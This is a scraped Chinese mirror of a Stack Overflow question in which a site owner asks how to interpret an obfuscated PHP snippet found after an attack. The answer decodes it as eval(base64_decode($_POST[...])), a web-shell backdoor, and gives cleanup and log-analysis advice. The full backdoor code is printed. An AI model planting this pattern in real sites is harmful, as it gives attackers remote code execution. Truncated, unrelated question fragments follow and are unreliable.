- r - 以节省内存的方式增长 data.frame
- ruby-on-rails - ruby/ruby on rails 内存泄漏检测
- android - 无法解析导入android.support.v7.app
- UNIX 域套接字与共享内存(映射文件)
我的服务器最近受到了攻击,我一直在尝试研究它是如何以及为什么会发生的。
我在病毒文件中发现了一个非常相似的模式,看起来像这样 - 据我所知,它正在尝试运行特定文件?
有没有人见过这样的事情,我应该如何解释?它只是根据 $sF
字符串抓取单个字符吗?
<?php
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
eval($s21($s22));
}?>
最佳答案
变量$s21
等于base64_decode
,$s22
等于$_POST['nd335c3']
。
每当向您的服务器发出 POST
请求时,它都会执行 $_POST['nd335c3'];
中的任何命令,正如您所料,这是非常危险的.
我非常怀疑您的服务器被黑了,而是您的网站脚本被利用了。您的网站上是否有用户可以上传文件的地方?我在 WordPress 中看到很多这样的东西,但插件编码很差。
解决问题
要解决此问题,请先删除此文件或代码部分。您可能希望关闭您的站点并将其置于维护模式,直到您可以搜索并验证所有其他文件都没有被修改。
网站备份并运行后,记录对被黑文件所在位置的请求或包含相同 POST 变量的请求。
一旦有用户向漏洞利用发送数据,您就可以检查所有其他日志文件并将它们与相同的 IP 地址和用户代理进行比较。这是一个遥远的镜头,但希望他们只使用一台计算机来进行攻击。从日志中你可以看到他们究竟访问了哪些内容来执行攻击并上传被利用的文件。
在未来预防这种情况
/tmp
关于php - 试图解码病毒,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29321907/
我是 C++ 的新手,我在使用这段代码时遇到了问题: string output_date(int day, int month, int year){ string date; if
所以我这样做了 tar cvzf test.zip FP 为了创建目录 FP 的 zip 但是,它会列出 zip 中的目录 FP/ FP/php/ FP/php/pdf/ FP/php/docs/ F
我正在尝试在 Swift、Xcode 7.3(所以是 Swift 2.2)中创建一个通用类,但我似乎无法让它通过编译器: protocol Struct1Protocol { } struct Str
我的测试用例是这样的: class FooTest extends PHPUnit_Framework_TestCase { /** @covers MyClass::bar */ f
我正在尝试将brew install wine作为使electron-builder工作的一步。但是我所能得到的只是以下响应: ==> Installing dependencies for wine
我这样做: string[,] string1 = {{"one", "0"},{"Two", "5"},{"Three","1"}}; int b = 0; for(int i = 0; i <=
我正在尝试使用 SetWindowsHookEx 键盘 Hook Notepad.exe。 如您所见,工作线程正在将其 ASCII 代码(即 wParam)发送到指定的服务器。 UINT WINAPI
我正在尝试将 ListView 实现到我的 Fragment 中,但无论我尝试什么,我都会得到一个 NullPointerException。我检查对象是否为 null 并记录是否为 null,看起来
我尝试在一行中对齐两个 div。使用 float left 属性,一切顺利。但是当我在 div 中使用图像时,它开始产生问题。 所以这是我的示例代码:- Some headi
我目前正在使用此代码来获取图像的灰度图像表示并以 (512, 370, 1) 的格式表示它大批。 img_instance = cv2.imread(df.iloc[i][x_col]) / 255.
总结 我正在创建一个简单的应用程序,它允许用户选择一个包含顶级窗口的进程。用户首先键入 native DLL(而非托管 DLL)的路径。然后用户键入将在 Hook 过程中调用的方法的名称。该方法不得返
我是一名优秀的程序员,十分优秀!